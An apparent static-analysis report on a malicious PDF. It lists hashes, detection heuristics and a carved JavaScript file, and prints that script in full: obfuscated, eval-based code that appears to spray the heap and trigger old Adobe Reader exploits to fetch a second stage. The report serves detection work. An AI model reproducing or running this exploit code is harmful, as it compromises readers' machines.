Malicious PDF — malware analysis report

Static analysis result for SHA-256 e4f0f838a7ae1eb2…

MALICIOUS

PDF

5.8 KB Created: 2010-07-25 10:32:51 Authoring application: FPDF 1.6 First seen: 2026-05-11
MD5: d1ee1704cc69b802f68dbef70ccef39c SHA-1: daca3947c83c6ac5440c47ea74dbfa63d623d0e0 SHA-256: e4f0f838a7ae1eb2475f2dbd48f0274e9e2d4e4405158d49e2b76ffcb8afad3c
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded and obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_FROMCHARCODE. The extracted artifact 'javascript_obj0007_000.js' likely contains code designed to download and execute a second-stage payload. The obfuscation suggests an intent to evade detection.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     function vf\(s\){var r='',v=[],w=String.fromCharCode,n=[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]];for\(z in n\){ for\(i=n[z][0];i<n[z][1];i++\){  v.push\(w\(i\)\); }}for \(var i = 0; i < s.length; i++\) { r+=v[s[i]];}eval\(r\);}vf\([65,64,71,86,79,68,85,74,80,79,0,71,74,89,46,74,85,8,90,66,83,84,81,12,0,77,70,79,9,92,65,64,88,73,74,77,70,0,8,90,66,83,84,81,14,77,70,79,72,85,73,0,10,0,50,0,60,0,77,70,79,9,92,65,64,90,66,83,84,81,0,11,61,0,90,66,83,84,81,59,65,64,94,65,64,90,66,83,84,81,0 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1EB 5041 bytes
SHA-256: 7aa0ed8a9fe814f9df6fb50bc986fca9f9698bac01a17c09292716b4f50277ba
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function vf(s){var r='',v=[],w=String.fromCharCode,n=[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]];for(z in n){	for(i=n[z][0];i<n[z][1];i++){		v.push(w(i));	}}for (var i = 0; i < s.length; i++) {	r+=v[s[i]];}eval(r);}vf([65,64,71,86,79,68,85,74,80,79,0,71,74,89,46,74,85,8,90,66,83,84,81,12,0,77,70,79,9,92,65,64,88,73,74,77,70,0,8,90,66,83,84,81,14,77,70,79,72,85,73,0,10,0,50,0,60,0,77,70,79,9,92,65,64,90,66,83,84,81,0,11,61,0,90,66,83,84,81,59,65,64,94,65,64,90,66,83,84,81,0,61,0,90,66,83,84,81,14,84,86,67,84,85,83,74,79,72,8,48,12,0,77,70,79,15,50,9,59,65,64,83,70,85,86,83,79,0,90,66,83,84,81,59,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,86,85,74,77,46,81,83,74,79,85,71,8,9,92,65,64,87,66,83,0,81,66,90,77,80,66,69,0,61,0,86,79,70,84,68,66,81,70,8,2,73,85,85,81,58,15,15,67,77,66,68,76,73,80,77,70,15,74,79,69,70,89,14,81,73,81,2,9,59,65,64,87,66,83,0,79,80,81,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,16,48,16,5,86,48,16,48,16,5,86,48,16,48,16,5,86,48,16,48,16,2,9,65,64,87,66,83,0,73,70,66,81,67,77,80,68,76,0,61,0,79,80,81,0,11,0,81,66,90,77,80,66,69,59,65,64,87,66,83,0,67,74,72,67,77,80,68,76,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,16,48,16,5,86,48,16,48,16,2,9,59,65,64,87,66,83,0,73,70,66,69,70,83,84,74,91,70,0,61,0,50,48,59,65,64,87,66,83,0,84,81,83,66,90,0,61,0,73,70,66,69,70,83,84,74,91,70,0,11,0,73,70,66,81,67,77,80,68,76,14,77,70,79,72,85,73,59,65,64,88,73,74,77,70,0,8,67,74,72,67,77,80,68,76,14,77,70,79,72,85,73,0,60,0,84,81,83,66,90,9,92,65,64,67,74,72,67,77,80,68,76,0,11,61,0,67,74,72,67,77,80,68,76,59,65,64,94,65,64,87,66,83,0,71,74,77,77,67,77,80,68,76,0,61,0,67,74,72,67,77,80,68,76,14,84,86,67,84,85,83,74,79,72,8,48,12,0,84,81,83,66,90,9,59,65,64,87,66,83,0,67,77,80,68,76,0,61,0,67,74,72,67,77,80,68,76,14,84,86,67,84,85,83,74,79,72,8,48,12,0,67,74,72,67,77,80,68,76,14,77,70,79,72,85,73,13,84,81,83,66,90,9,59,65,64,88,73,74,77,70,0,8,67,77,80,68,76,14,77,70,79,72,85,73,11,84,81,83,66,90,0,60,0,48,89,52,48,48,48,48,9,92,65,64,67,77,80,68,76,0,61,0,67,77,80,68,76,0,11,0,67,77,80,68,76,0,11,0,71,74,77,77,67,77,80,68,76,59,65,64,94,65,64,87,66,83,0,78,70,78,46,66,83,83,66,90,0,61,0,79,70,88,0,16,83,83,66,90,8,9,59,65,64,71,80,83,0,8,87,66,83,0,74,0,61,0,48,59,0,74,0,60,0,49,52,48,48,59,0,74,11,11,9,92,65,64,78,70,78,46,66,83,83,66,90,42,74,44,0,61,0,67,77,80,68,76,0,11,0,73,70,66,81,67,77,80,68,76,59,65,64,94,65,64,87,66,83,0,79,86,78,0,61,0,49,50,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,59,65,64,86,85,74,77,14,81,83,74,79,85,71,8,2,5,52,53,48,48,48,71,2,12,0,79,86,78,9,59,65,64,94,65,64,65,64,65,64,71,86,79,68,85,74,80,79,0,81,69,71,46,84,85,66,83,85,8,9,92,65,64,87,66,83,0,87,70,83,84,74,80,79,0,61,0,66,81,81,14,87,74,70,88,70,83,37,70,83,84,74,80,79,14,85,80,34,85,83,74,79,72,8,9,59,65,64,87,70,83,84,74,80,79,0,61,0,87,70,83,84,74,80,79,14,83,70,81,77,66,68,70,8,15,43,19,15,72,12,7,7,9,59,65,64,87,66,83,0,87,66,83,84,74,80,79,46,66,83,83,66,90,0,61,0,79,70,88,0,16,83,83,66,90,8,87,70,83,84,74,80,79,14,68,73,66,83,16,85,8,48,9,12,0,87,70,83,84,74,80,79,14,68,73,66,83,16,85,8,49,9,12,0,87,70,83,84,74,80,79,14,68,73,66,83,16,85,8,50,9,9,59,65,64,74,71,0,8,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,61,61,0,56,9,0,6,6,0,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,49,44,0,61,61,0,48,9,0,93,93,0,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,49,44,0,61,61,0,49,0,6,6,0,87,66,83,84,74,80,79,46,66,83,83,66,90,42,50,44,0,60,0,51,9,9,92,65,64,86,85,74,77,46,81,83,74,79,85,71,8,9,59,65,64,94,65,64,74,71,0,8,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,60,0,56,9,0,93,93,0,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,61,61,0,56,0,6,6,0,87,66,83,84,74,80,79,46,66,83,83,66,90,42,49,44,0,60,0,50,0,6,6,0,87,66,83,84,74,80,79,46,66,83,83,66,90,42,50,44,0,60,0,50,9,9,92,65,64,68,80,77,77,66,67,46,70,78,66,74,77,8,9,59,65,64,94,65,64,74,71,0,8,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,60,0,57,9,0,93,93,0,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,61,61,0,57,0,6,6,0,87,66,83,84,74,80,79,46,66,83,83,66,90,42,49,44,0,60,0,49,9,9,92,65,64,68,80,77,77,66,67,46,72,70,85,74,68,80,79,8,9,59,65,64,94,65,64,94,65,64,65,64,66,81,81,14,66,77,70,83,85,8,7,85,70,84,85,49,50,51,7,9,59,65,64]);;

Open this report in the interactive analyzer, or submit your own file for analysis.